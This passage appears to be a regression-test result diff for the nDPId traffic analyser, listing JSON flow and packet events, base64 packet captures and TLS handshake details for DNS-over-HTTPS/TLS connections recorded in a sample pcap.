gOBpUtJCVQOwstz8rJvV98lhrypc92o1bXoXeUIxGojGdQmZAgxriin+ux8aVQDWCuRuunDdKlwCqYBaBQ5f2rPbpDMmRJRFIQV93Nffpu5y2M2nD2zqfxShtHtZqK9Odguom6eKtfMYRNoP0\/G2utDI3qzWXA4Mjnq20qW6WLp3\/OACxfwxJs+mIIux4CN4Of382BKD+HUg6iVDD+mi+PZO8yXcm+iMHr94FuVjknbJgwr8pz8hnl6BJO7Py9BRIAZSwIskF6wOgI\/\/4Qr2JcZ3TwaII9SEN+0Sx8PMXXAKDv89DA4GNqNhV0hw6VXwyvbxpg4tI+badMBjtd\/o4XHqPH+BgFz6M8EMB4Jddticq89uWfyyGOVmNlx8K6oUYEdD6RJBEwIP6yYPzzeebCbDK3en7B16cFcus7h8285+5Wxpsa9ruV64Q9ZoEhEUMGgffnT5ajZ+UpmS77fDl+DfNEzJY8TjXm9EL8XAwMBGQ9SGwhaT+0AWTV1WADn36NruqoDTHdQXMB5KJVX+hyENZfYkPjY19bk0TmuSlxnW4sPXtcFmHvEzv8TYCgHXXFqdgaXEgdtFhRRSPS0CqywSlTwtg9zlqkP6Vu\/gi2jnM2lX\/S3paNkHLJK2Xs42G6p+yMmyRBfn14DEFDykxvC8z+scW1WMMiVZcbQBKhJ+Ek8WtRoS9WYaJ74jobV62XFVLje4Al6wOy0PssyggYMNCsvtsxQ5KXxmsj4du7sF6hIaLMWOz7O8LamYiEYnY4YByhzDbINOM3XB385ribm3TlBE2FwQhpCNmgQNjG7wIBC9IfEBLxv5rxwvF8PVckgsWpRxADmo+gltAb0\/tgSzKl\/30lZxZ8BFwMDADWhE8bE7ktzdpeT1iEQv9HPHLrjBcBDs9EHJnB16E0omVuS5qQqwxUOOBNAVfkBff92\/dyz\/Q=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946739310588,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739310588,"pkt":"REREREREZmZmZmZmCABFAAFGz7FAAL0GqFMKAAABp3LcfZKaAcWpCIgSh0x2XlAYAfZF5QAAFgMBARkBAAEVAwNM+6CQ4xrTV+1tOPP7h0Gj90S89M7DOPc8QQnDuq\/mRiD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMS5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDUjoSgwC\/YwRC2sL4\/9W3ATSzLtM\/v84EfifaAhQZfWw=="} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946739310697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3154,"pkt_l4_len":3120,"thread_ts_msec":946739310697,"pkt":"ZmZmZmZmRERERERECABFAAxEyD9AADMGLsinctx9CgAAAQHFkpqHTHZeqQiJMFAYAfVQ4wAAFgMDAHoCAAB2AwOMlhGBzZbQdgMB7SlRRNR6aAHyhH11lUBOX85ujHC26yD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDxMBAAAuACsAAgMEADMAJAAdACBUUq246Yl+EWhWLEvZvcutMb+IirYuhEzXmLk3lr59QxQDAwABARcDAwAgZrqPXWP2zV85oWOqSEKZV0DzXUfiOwwJJ+C5CgZ1QqEXAwMKFVw16EKwmaYl6UqgM5FDRFEvQkVVdsBwborgCOxUvP2YbrJsHBMovDHHpAcBFTWebPQJMSKasadU094aHDRpLPrxxCjXB2pxM0WIqTvteHWIfU1Fk5\/NpqSuHKzO0Ra3PwdESYixe\/zb6sDdKKc1TRT99VsGnFNvwT\/9kRj6LGAVtWhnVsCfJH598qgWQ0wNsN5\/qg97535WjDSAoptbAHelOwuJgc8mZW87Z778lSdbGSJVYmbS+Kzpu3czloyo+k8tnMR0gAcl1hEQQ49kVF90oJqhnl11GE\/B0nhnrDcMC484Ni2gzPflOc2ve4l75Bv19quG6UuBjAJ+lAILT2sCAli3NgfXnu\/RIxYWHOwg5dkUsitPEbeddf7oCeQEhHZOIe8IWZHCTWJ8Xas6gq1DtDEctxSwxYTmBOPQYJURvi5XAJunxgkYorZ1S5H22PsJbPQoDTXE7jb\/MK+t+sJi\/qLBk\/QTcK+QjjpfOnPOG6kcTfb96PDiNmimFlhI+7qPbHOuBFKP3RlOfNCtE0LR80aRulQJ7mOKrhCqpMkFgCoXo\/4IvZulEfNa6rLjjxU0mGwRO9C\/8SUW\/MWxf9V+fhaFIFLLIrdk9mjlOAh4RTjBuIhZwdSm01OHFabvxJQc5nWUTI8sDv\/4Hth4Nmyyi395Zo\/bIgvPNsPA6YqSbJJPw7TRXj9EpeXABU58rfRMlnEHMcHSeAnr61+lHN29cf2rb7cQuEObxOV+r0Ti2hnTxG1kzZXxUKMf1TJz\/QNCPdFs\/8sc7I75BLceNNdyiMxbhvl0\/mQYkbbTX+E01I4nneSr0YAWi\/dj5OFWkY5oKdT3ijaj5ZnH8mUoUzF6gidtHrJfWLUutNNAVK0ii3hJTxAh53tLa55cziofBXUjER9OxqdXFQX0xk0dW5\/N25Am3sfN4K9G9Or+Mq0ZjCUN\/b\/4AAu5iVdc2xuiywbhKCKv\/+1ba649i2+11N2NuNP4WLerjRdmVgUEXTqjPsE1bvdPpgn\/tgD\/NfJO4snitGVo2fF0AIvoI8ffNDBM8mHNAe\/P4wCN21PuNzrXMiMwd7BKvHy1yaV3bx1ZcbZVsRq2ArQ\/sz1xvbYIM5K\/4uE3U5TUD7iEvNa+H0F0t5Pm3xl9hPFjB8UQZyCzE0eaHFxztuY1AhJrANiSpn9KUApux28hlfmPpxZwwY\/4voaTDNDh4a6l1L\/5bBlTMZQ8ZTPo3KsCc7rYoLRgUBfec4EVT3pXIcfZwnttUMEultj1OSOdAYKMUVl+Ae797PlHj+BPOvQU1JP+1NxmeW9EkPxvKNxTuFB8Ql03lSa0sP7N4iOT4LxwTyM6btUOuFjsDMq5fFh3z8x6u4eDmVvymYi2lDSt123i5VnAGlmqe2vlBnBoLSjRbpHHKNWC14LFSfaclke+Fsk\/LXqRdmrmwoK42FR8QM5yBJ4V4XBtfp1iJayJWXrv2Yp\/Jw2nGI\/8spJXweIKBfFJYNDE+FKqYVx6uY0QURwmsxmAiNbUSW3iE5ptj6f47Bqqzcu614k3woIktKLvq+R5kAUl\/94OeFfc1MDcYQiS1itHZ6WgYMqXlALhkIaagT341vLWH8EINXXu\/JPbuL4ratmRZsOHcAq4Z64Qth7VsN\/NAOgVmBZa9WLc6jmBs+\/7oNewv6pYbinaC9eFjw+AUviDZIoPDTI2cqHtCKNJKtQeYF8JwZdso+kGs0e4hY6Ekh+Gt4QIAdcddPMJiEMdHRRcI7TJwLsTmixFKIFFEmFMcRnAgRce970vQl6+J2m\/3\/zT76RlKTnb6S5cA2Gh1xVWfifqZ+dJJ4S6U8o2kzOx1BcO4lPr6QndhbLXBopt+TnAxhiNVC0jGSLxxKfJsKliuCmauybike5VfhMB74\/Zd9LI0lHZcyjtrJZpkqIdf9mUmq84TeFEVObpfDxeDp9pwfwnzY7CZiAhc8H7X\/B4eL6QPbJJeDvWRsaiMa8MtOGUovwBK\/1RmmRbBs9Ps\/WvCegAP2zZsifFoeWn3IFAPuF2t4F1jzP6KFB2fJjiCF\/xSMUdVX4mSSLxUy6Noq6HH8DTkiTT7i5Rtb6Z+6YPqTrIz0kRUJm8ymK8qGaWvXbafgJW+zAD6LQJ6Uz\/H9ede+fQeVaNdwR2ZGANN93T8+CUOO\/5QCgVylxvI+WkULYljrgmsAHGf2x4K+AdzUNCRbtqqamvoa9+H9TZ6D9K0XHtu60WRh\/xvg+0kvul3oISkBwW\/5VC47CJIkeqDKIcaH28dzjF68bVaWHBCOA\/QVspO8f7PM39uibr2ZI\/9qT7jw8Z+41laurnLDDiiTcv8nIyk9gPkkLpL0gZ8B7RwNepdi9poakmfyvLsu7noykkUZPrrciaDs4AxlMW2SE0l6ggoSXHblXDfGv1qrkJ+wYHqoIpx4Orz9BIDwmFuIK9uApDePCMMJ8COMRLP5+c7CWBbef3qNt43feI9i3DxrqohnnAeDQ5XayaaeIrWeswn\/yTkRhpCGBJsg0rlCy0bwelKJ5jOd0Z6yAeLdgeBTN7mANe1L7262l3N\/TUj4BGdpkUJSKWZ+F5L9xh3ZDx0CN7nut3setCOi4jALV8qZWBwNBsnPw\/1et9Mhz5yQU5W4hKDkIkR0JbpteXZI\/YulIUs304N95S0rMRs+F91Z\/I1bjxYITEBnA3nKgeOqnJG67UQeyBJy3Wot3ZWs1FnfHSinzEDRXoy\/in3NMk3Ee4UJjJJVvh1u1kB0flpae3nwu8yHniwAQeA4V\/IYlytwzxmH9UBxClJ1YaCH4QYvYTNNn4X5yrgDRFy8aRZbx7KFTZjETXMAwD7jXdzFpBRNyur7a5hxwjkpR1nPJHXNHbl9ulhBQraPk64O22lXmWhmTqqJxPCHLTJc8dCW9Tw+MWIDqlSC6iP\/uFGWMugMNTbPpm71YwCV6DE3MM5Iw3r\/pJtSMpVM1czkfmhYfe8YtiZEI64Bh59v3JQ7Geu6i4Q2THuBrvHiZucUzufDS6W\/DBGI9K4\/J9OjIx3bbp4KuEgDSz3alUQX8h9N3c6Ve\/ecJdJcy74VVi6oGyfaHP6IVk7S15X3oTFjfGBcG+hk0a0dR\/W0BGALH+pY8iH726JsGgeEg52jxxJyoyqN2BP+Onsb9VAjI4Axsa9MyFPMa6R4QE78VraMZsIMjQY2e6jOI2lFaIx1i29CS8IB7OY+l9i9GRSJhN1TC+qRidWiZdwiZ6CGxjzCAIjCNtYYMpt94CcLWARqfnvGVuwq7RqWOpW3L6qgDcGRhcwof3dXDPhz02YMhWNSauXVnUXZfqF8vmR+tgeJWIevQpdj5ioEIsT2Um5j+gijjHh859fJLDhzYVmYtQ3TEi737GfFw2SXnggL\/Iy07c7IZEI94AezYiyRdA9+kLWGaO\/dAL2rthXXz37bspZFnOGyuB0KI3G4RabCIXAwMBGcOMNM44BDplKj\/3Ojq4jdtuoD82NTa5b2k5zkFslQd12hFn3q5eB44nkwI465O8I9pSVocWpqU9EbYhTvyK1R8N4URD7Q5PMRg7Umy5tkS2hB9uZLmMl9DoKxlIW+kyr\/KuqeGrCAN583A5M1yhRuOwYF56CIKxvuyChPRKUAt8\/70gOTQjynH\/\/1nGoYgPF\/ta4eVsTLhuzDLb9mQMc16\/4VLa51E7HgIT9to4lg95nWvnMoIyp4a8sRcKKCYU92Ot4xWr0tqEIEu0fXIbk7\/Ta2loRt8FUwirJas4rlQGX1glaJy9RyPTHTwKV9kLdjGIRncOAxHu\/8Q7IfLg2aWJ07\/3naoyq6szJDQTcE3S8LB44P4jJ13NFwMDADUJ1y22teIy1dcIiwJwX4cS160nI55Nkh7bUzq2ftRXjrZxugVJnOhQTCokK54\/+GLzaYeqbw=="} -01082{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310588,"flow_last_seen":946739310697,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":1693,"midstream":1,"thread_ts_msec":946739310697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01082{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310588,"flow_last_seen":946739310697,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":1693,"midstream":1,"thread_ts_msec":946739310697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946739310700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739310700,"pkt":"REREREREZmZmZmZmCABFAABoz7NAAL0GqS8KAAABp3LcfZKaAcWpCIkwh0yCelAYAfVFBwAAFAMDAAEBFwMDADWIup5ey1m73Olzdr+La\/pgBsOV2156nE0gjo7pkVZbX+HWq3wNBOBZgTPS2Gv4V1H1NoVl6Q=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946739310980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739310980,"pkt":"REREREREZmZmZmZmCABFAAFBYCBAAL0GW60KAAABuSuHAZUqAburhCguMeSlTVAYAfYCHQAAFgMBARQBAAEQAwM7gJo4OG7S+iUgpLXTuxo5Xw1OBGj4DiyxVBvpcTjrrSC1ygzgmnU02BGfASVXjVBWPNfoJIqu28ODMXbR4UvXGQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALb2R2ci5uaWMuY3oABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg+HQ6d2TRAhXiPlV4SzYTTgVvyRFR0ttaRH8caXLPDAE="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946739311016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3057,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3057,"pkt_l4_len":3023,"thread_ts_msec":946739311016,"pkt":"ZmZmZmZmRERERERECABFAAvj5XlAADUGU7K5K4cBCgAAAQG7lSox5KVNq4QpR1AYAO0MvwAAFgMDAGICAABeAwOYp2uqwk2kagwv1bFvuG7BP4gwxFJK\/HnbYlDDBgxtByBtkhDnIYlAH5FeNvmtcy43X+awJKk1khM1gLQ9O4\/1KcAvAAAW\/wEAAQAACwAEAwABAgAQAAUAAwJoMhYDAwn0CwAJ8AAJ7QAFUTCCBU0wggQ1oAMCAQICEgOvzNhD6HsqkMaua9kU943O+TANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMwHhcNMjAwODAzMDY1MzUwWhcNMjAxMTAxMDY1MzUwWjAWMRQwEgYDVQQDEwtvZHZyLm5pYy5jejCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMSBtMaoOIrrVwbIP2cWYEJHSXjqgj\/\/9tkWX5PXpNopleDTdQVoDYtrhgWWdCxKvyghVnCCvqzpAdxH9iHJ+YDCJvMhSONvyUnQC+8wqGClBPGGgWuYJiWCNGWLq05jQxU5OjFamZYLeA83J41w0hXJ0caGVgR+ZmGHFjjdBCJABPqlSZbx4n\/8eqoqwv3W6903WKQrR8zszV5MtKKlTANB6QP2yhXI+UhhzdoeLxrEImAA6gxL2BOHWdKuBhBuV+ph8YRaL5IiMHVdXgcmxhPMtLDMaXcrlQWC6XO\/mVYjsQjycz9NHwfX9HBGmqdB8EpxpqAzOMv4Pfea+srqI+sCAwEAAaOCAl8wggJbMA4GA1UdDwEB\/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH\/BAIwADAdBgNVHQ4EFgQUiF81uRjtpDLZWzD7gWIvMHk\/TcYwHwYDVR0jBBgwFoAUqEpqYwR93brm0Tm3pkVl7\/Oo7KEwbwYIKwYBBQUHAQEEYzBhMC4GCCsGAQUFBzABhiJodHRwOi8vb2NzcC5pbnQteDMubGV0c2VuY3J5cHQub3JnMC8GCCsGAQUFBzAChiNodHRwOi8vY2VydC5pbnQteDMubGV0c2VuY3J5cHQub3JnLzAWBgNVHREEDzANggtvZHZyLm5pYy5jejBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQMGCisGAQQB1nkCBAIEgfQEgfEA7wB2AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc7NP+yAAAAQDAEcwRQIhAKJu6NqRyIYQsDPHU\/A2REhgeKHjM4x+XnuUUYMuSVKBAiBvFXWETRjBcg4jaK4iYqlFL3MxxHaFAihU4M5Y1\/QWIQB1AAe3XBvlfWj\/8bDGHSMVx7rmV3xXlLdq7rxhOhpp06IcAAABc7NP+0kAAAQDAEYwRAIgbhSITSEVzSp\/pS3dsOxVrCnCOPr0QsQS\/Z8OeZ0VJL4CIEqFJZjRYER6kq4HNRyZ4yzxaPbu\/njrCFn4rfkG\/MO7MA0GCSqGSIb3DQEBCwUAA4IBAQCGEOIQRUNcWjsX719Aj278yDJZeRktrpYQiEzTApT2VFFAVk9RNpDtIgove0nygMmo0gYcRhVp8veJjqVoyBOpTj8fBZ0k4jHFaDhaRBi5aQXOMln+cU\/N+ZZyxOF\/OvhfMIgmGnNpnX15fmj0DD6pQOeMMvjd9\/6LhaAOIYehc8T\/qnYYgS+NN4PGwZ62L8NBcloKk78UBZkehMmgkPB4R4UGWU+P\/9wBXoct8xHeSEI\/RKypAvQONIxcx+PGOfY7cug8EawYjQxeC0dBrCPA4HuTbflrjLpxCEjs2nsPD4SXJGGl7AoG4paGMGZjt4DcZO2jhWz5unIehkjqEM\/fAASWMIIEkjCCA3qgAwIBAgIQCgFBQgAAAVOFc2oLheynCDANBgkqhkiG9w0BAQsFADA\/MSQwIgYDVQQKExtEaWdpdGFsIFNpZ25hdHVyZSBUcnVzdCBDby4xFzAVBgNVBAMTDkRTVCBSb290IENBIFgzMB4XDTE2MDMxNzE2NDA0NloXDTIxMDMxNzE2NDA0NlowSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnNMM8FrlLke3cl03g7NoYzDq1zUmGSXhvb418XCSL7e4S0EFq6meNQhY7LEqxGiHC6PjdeTm86dicbp5gWAf15Gan\/PQeGdxyGkOlZHP\/uaZ6WA8SMx+yk13EiSdRxta67nsHjcAHJyse6cF6s5K671B5TaYucv9bTyWaN8jKkKQDIZ0Z8h\/pZq4UmEUEz9l6YKHy9v6Dlb2honzhT+Xhq+w3Brvaw2VFn3EK6BlspkENnWAa6xK8xuQSXgvopZPKiAlKQTGdMDQMc2PMTiVFrqoM7hD8bEfwzB\/onkxEz0tNvjj\/PIzark5McWvxI0NHWQWM6r6hCm21AvA2H3DkwIDAQABo4IBfTCCAXkwEgYDVR0TAQH\/BAgwBgEB\/wIBADAOBgNVHQ8BAf8EBAMCAYYwfwYIKwYBBQUHAQEEczBxMDIGCCsGAQUFBzABhiZodHRwOi8vaXNyZy50cnVzdGlkLm9jc3AuaWRlbnRydXN0LmNvbTA7BggrBgEFBQcwAoYvaHR0cDovL2FwcHMuaWRlbnRydXN0LmNvbS9yb290cy9kc3Ryb290Y2F4My5wN2MwHwYDVR0jBBgwFoAUxKexpHsscfrb4UuQdf\/EFWCFiRAwVAYDVR0gBE0wSzAIBgZngQwBAgEwPwYLKwYBBAGC3xMBAQEwMDAuBggrBgEFBQcCARYiaHR0cDovL2Nwcy5yb290LXgxLmxldHNlbmNyeXB0Lm9yZzA8BgNVHR8ENTAzMDGgL6AthitodHRwOi8vY3JsLmlkZW50cnVzdC5jb20vRFNUUk9PVENBWDNDUkwuY3JsMB0GA1UdDgQWBBSoSmpjBH3duubRObemRWXv86jsoTANBgkqhkiG9w0BAQsFAAOCAQEA3TPXEfNjWDjdGBX7CVW+dla5cEilaUcne8IkCJLxWh9KEik3JHRRHGJouM2VcGfl96S8TihRzZvoroed6ti6WqEBmtzw3Wodatg+VyOeph4EYpr\/1wXKtx8\/wApIvJSwtmVi4MFU5aMqrSDE6ea73Mj2tcMyo5jMd6jmeWUHK8so\/joWUoHOUgwuX4Po1QYz+3dszkDqMp4fklxBwXRsW10KXzPMTZ+sOPAveyxindmjkW8lGy+QsRlGPfZ+G6Z6h7mjem0Y+iWlkYcV4PIWL1iwBi8saCbGS5jN2p8M+X+Q7UNKEkROb3N6KOqkqm57TH2H3eDJAkSnh6\/DNFu0QhYDAwFNDAABSQMAF0EE7OwduzycCFyh5foVYUYJfj2csLLoqbmNrs4ksDiqkMaHC2NulFxfST4jcCRZ19YEaLojL5JVRvlluRb8LA6yDQQBAQARbpzNdpCTfHNn9Bz14lNKRHZrsXa4X4EmfyVVEagU6WSCW5UKp3bMis8UAzosg4RFbcIE\/BqKgmQG64Bt\/cGitnxq47bonIC\/OFLylrM320R6R6uLkQuGNQpkUlgrZKL\/+YkYqd4ToLlZjenqQeguYlPWOUvDEduCfvOd+A9y2fcGuSyrbb0En99qwYiK1PUm11WXjEDQ91vzKm5Pz2wWWFYuywvRbHOtLetuqGEfMtz5QTTP+GA2fJf1SHhqAtT7v7XaP+5Wvee65IgIoNU6aiAVYz3hwW\/AkDmTqCcqZ60